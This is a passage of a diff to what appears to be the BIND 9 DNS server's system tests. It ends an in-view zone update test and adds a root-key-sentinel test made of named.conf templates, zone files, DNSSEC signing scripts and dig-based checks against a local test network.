text1.test. TXT > dig.out.2.test$n +grep 'include 1' dig.out.2.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "update in-view zone ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$NSUPDATE -p ${PORT} -y "$TSIG" > /dev/null 2>&1 <<END || ret=1 +server 10.53.0.7 +zone test. +update add text2.test. 600 IN TXT "addition 1" +send +END +[ -s ns7/test.db.jnl ] || { + echo_i "'test -s ns7/test.db.jnl' failed when it shouldn't have"; ret=1; +} +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "checking update ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text2.test. TXT > dig.out.1.test$n +grep 'addition 1' dig.out.1.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +nextpart ns7/named.run > /dev/null + +echo_i "rndc freeze" +$RNDCCMD 10.53.0.7 freeze | sed 's/^/ns7 /' | cat_i | cat_i + +wait_for_log 3 "dump_done: zone test/IN/internal: enter" ns7/named.run + +echo_i "edit zone files" +cp ns7/test.db.in ns7/test.db +cp ns7/include2.db.in ns7/include.db + +echo_i "rndc thaw" +$RNDCCMD 10.53.0.7 thaw | sed 's/^/ns7 /' | cat_i + +wait_for_log 3 "zone_postload: zone test/IN/internal: done" ns7/named.run + +echo_i "rndc reload" +$RNDCCMD 10.53.0.7 reload | sed 's/^/ns7 /' | cat_i + +wait_for_log 3 "all zones loaded" ns7/named.run + +n=$((n+1)) +echo_i "checking zone file edits are loaded ($n)" +ret=0 +TSIG="$DEFAULT_HMAC:int:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. TXT > dig.out.1.test$n +grep 'include 2' dig.out.1.test$n >/dev/null || ret=1 +TSIG="$DEFAULT_HMAC:ext:FrSt77yPTFx6hTs4i2tKLB9LmE0=" +$DIGCMD @10.53.0.7 -y "$TSIG" text1.test. TXT > dig.out.2.test$n +grep 'include 2' dig.out.2.test$n >/dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rootkeysentinel/clean.sh b/bin/tests/system/rootkeysentinel/clean.sh new file mode 100644 index 0000000..e9cd3cc --- /dev/null +++ b/bin/tests/system/rootkeysentinel/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.ns?.test* +rm -f */dsset-* +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */trusted.conf +rm -f ns1/K.* +rm -f ns1/root.db +rm -f ns1/root.db.signed +rm -f ns2/Kexample.* +rm -f ns2/example.db +rm -f ns2/example.db.signed +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/rootkeysentinel/ns1/named.conf.in b/bin/tests/system/rootkeysentinel/ns1/named.conf.in new file mode 100644 index 0000000..930f3bc --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns1/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rootkeysentinel/ns1/root.db.in b/bin/tests/system/rootkeysentinel/ns1/root.db.in new file mode 100644 index 0000000..cc97041 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns1/root.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2018031400 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/rootkeysentinel/ns1/sign.sh b/bin/tests/system/rootkeysentinel/ns1/sign.sh new file mode 100644 index 0000000..4a1770e --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns1/sign.sh @@ -0,0 +1,36 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +keyname=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyid=$(expr ${keyname} : 'K.+[0-9][0-9][0-9]+\(.*\)') + +(cd ../ns2 && $SHELL sign.sh ${keyid:-00000} ) + +cp ../ns2/dsset-example$TP . + +cat $infile $keyname.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds $keyname > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf diff --git a/bin/tests/system/rootkeysentinel/ns2/example.db.in b/bin/tests/system/rootkeysentinel/ns2/example.db.in new file mode 100644 index 0000000..92ca3bf --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns2/example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2018031400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/rootkeysentinel/ns2/named.conf.in b/bin/tests/system/rootkeysentinel/ns2/named.conf.in new file mode 100644 index 0000000..25e4e50 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns2/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "example" { + type primary; + file "example.db.signed"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rootkeysentinel/ns2/sign.sh b/bin/tests/system/rootkeysentinel/ns2/sign.sh new file mode 100644 index 0000000..bae212e --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns2/sign.sh @@ -0,0 +1,44 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# leave as expr as expr treats arguments with leading 0's as base 10 +# handle exit code 1 from expr when the result is 0 +oldid=${1:-00000} +newid=$(expr \( ${oldid} + 1000 \) % 65536 || true) +newid=$(expr "0000${newid}" : '.*\(.....\)$') # prepend leading 0's +badid=$(expr \( ${oldid} + 7777 \) % 65536 || true) +badid=$(expr "0000${badid}" : '.*\(.....\)$') # prepend leading 0's + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example. +infile=example.db.in +zonefile=example.db + +keyname1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone) +keyname2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone) + +cat $infile $keyname1.key $keyname2.key >$zonefile +echo root-key-sentinel-is-ta-$oldid A 10.53.0.1 >> $zonefile +echo root-key-sentinel-not-ta-$oldid A 10.53.0.2 >> $zonefile +echo root-key-sentinel-is-ta-$newid A 10.53.0.3 >> $zonefile +echo root-key-sentinel-not-ta-$newid A 10.53.0.4 >> $zonefile +echo old-is-ta CNAME root-key-sentinel-is-ta-$oldid >> $zonefile +echo old-not-ta CNAME root-key-sentinel-not-ta-$oldid >> $zonefile +echo new-is-ta CNAME root-key-sentinel-is-ta-$newid >> $zonefile +echo new-not-ta CNAME root-key-sentinel-not-ta-$newid >> $zonefile +echo bad-is-ta CNAME root-key-sentinel-is-ta-$badid >> $zonefile +echo bad-not-ta CNAME root-key-sentinel-not-ta-$badid >> $zonefile + +$SIGNER -P -g -o $zone -k $keyname1 $zonefile $keyname2 > /dev/null diff --git a/bin/tests/system/rootkeysentinel/ns3/hint.db b/bin/tests/system/rootkeysentinel/ns3/hint.db new file mode 100644 index 0000000..0018b52 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns3/hint.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/rootkeysentinel/ns3/named.conf.in b/bin/tests/system/rootkeysentinel/ns3/named.conf.in new file mode 100644 index 0000000..c9682c9 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns3/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; + root-key-sentinel yes; +}; + +zone "." { + type hint; + file "hint.db"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rootkeysentinel/ns4/hint.db b/bin/tests/system/rootkeysentinel/ns4/hint.db new file mode 100644 index 0000000..0018b52 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns4/hint.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 diff --git a/bin/tests/system/rootkeysentinel/ns4/named.conf.in b/bin/tests/system/rootkeysentinel/ns4/named.conf.in new file mode 100644 index 0000000..6f60ffd --- /dev/null +++ b/bin/tests/system/rootkeysentinel/ns4/named.conf.in @@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; + root-key-sentinel no; +}; + +zone "." { + type hint; + file "hint.db"; +}; + +include "trusted.conf"; diff --git a/bin/tests/system/rootkeysentinel/setup.sh b/bin/tests/system/rootkeysentinel/setup.sh new file mode 100644 index 0000000..a84f2e7 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +cd ns1 +$SHELL sign.sh diff --git a/bin/tests/system/rootkeysentinel/tests.sh b/bin/tests/system/rootkeysentinel/tests.sh new file mode 100644 index 0000000..c1b43b1 --- /dev/null +++ b/bin/tests/system/rootkeysentinel/tests.sh @@ -0,0 +1,296 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +newtest() { + n=`expr $n + 1` + case $# in + 1) + echo_i "$1 ($n)" + ;; + 2) + echo_i "$1" + echo_ic "$2 ($n)" + ;; + esac + ret=0 +} + +newtest "get test ids" +$DIG $DIGOPTS . dnskey +short +rrcomm @10.53.0.1 > dig.out.ns1.test$n || ret=1 +oldid=`sed -n 's/.*key id = //p' < dig.out.ns1.test$n` +oldid=`expr "0000${oldid}" : '.*\(.....\)$'` +newid=`expr \( ${oldid} + 1000 \) % 65536` +newid=`expr "0000${newid}" : '.*\(.....\)$'` +badid=`expr \( ${oldid} + 7777 \) % 65536` +badid=`expr "0000${badid}" : '.*\(.....\)$'` +echo_i "test id: oldid=${oldid} (configured)" +echo_i "test id: newid=${newid} (not configured)" +echo_i "test id: badid=${badid}" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check authoritative server (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.2 example SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check test zone resolves with 'root-key-sentinel yes;'" " (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 example SOA > dig.out.ns3.test$n +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-${oldid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel yes;' (expect SERVFAIL)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-${oldid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with old ta, CD=1 and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 +cd root-key-sentinel-not-ta-${oldid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel yes;' (expect SERVFAIL)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-${newid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with new ta, CD=1 and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 +cd root-key-sentinel-is-ta-${newid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-${newid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel yes;' (expect SERVFAIL)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-${badid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: SERVFAIL" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with bad ta, CD=1 and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 +cd root-key-sentinel-is-ta-${badid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-${badid}.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with out-of-range ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-72345.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with out-of-range ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-72345.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with no-zero-pad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-is-ta-1234.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with no-zero-pad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 root-key-sentinel-not-ta-1234.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 old-is-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "old-is-ta.*CNAME.root-key-sentinel-is-ta-${oldid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 old-not-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "old-not-ta.*CNAME.root-key-sentinel-not-ta-${oldid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 new-is-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "new-is-ta.*CNAME.root-key-sentinel-is-ta-${newid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel yes;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.3 new-not-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "new-not-ta.*CNAME.root-key-sentinel-not-ta-${newid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 bad-is-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "bad-is-ta.*CNAME.root-key-sentinel-is-ta-${badid}.example" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel yes;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.3 bad-not-ta.example A > dig.out.ns3.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +grep "bad-not-ta.*CNAME.root-key-sentinel-not-ta-${badid}.example." dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check test zone resolves with 'root-key-sentinel no;'" " (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 example SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-${oldid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-${oldid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-${newid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with new ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-${newid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-${badid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with bad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-${badid}.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with out-of-range ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-72345.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with out-of-range ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-72345.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-is-ta with no-zero-pad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-is-ta-1234.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check root-key-sentinel-not-ta with no-zero-pad ta and" " 'root-key-sentinel no;' (expect NXDOMAIN)" +$DIG $DIGOPTS @10.53.0.4 root-key-sentinel-not-ta-1234.example A > dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +newtest "check CNAME to root-key-sentinel-is-ta with old ta and" " 'root-key-sentinel no;' (expect NOERROR)" +$DIG $DIGOPTS @10.53.0.4 old-is-ta.example A > dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "old-is-ta.*CNAME.root-key-sentinel-is-ta-${oldid}.example." 